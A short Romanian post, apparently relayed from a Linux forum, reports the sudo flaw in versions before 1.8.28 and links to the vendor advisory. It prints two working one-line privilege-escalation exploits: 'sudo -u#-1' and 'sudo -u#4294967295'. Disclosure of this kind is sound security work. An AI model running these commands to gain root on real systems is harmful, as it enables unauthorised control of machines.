O eroare în sudo vă permite să executați orice fișier executabil ca root dacă /etc/sudoers permite să fie executat de alți utilizatori și este interzis pentru root.
Exploatarea erorii este foarte simplă:
sudo -u#-1 id -u
sau:
sudo -u#4294967295 id -u
Eroarea este prezentă în toate versiunile de sudo înainte de 1.8.28
Detalii:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Sursa: linux.org.ru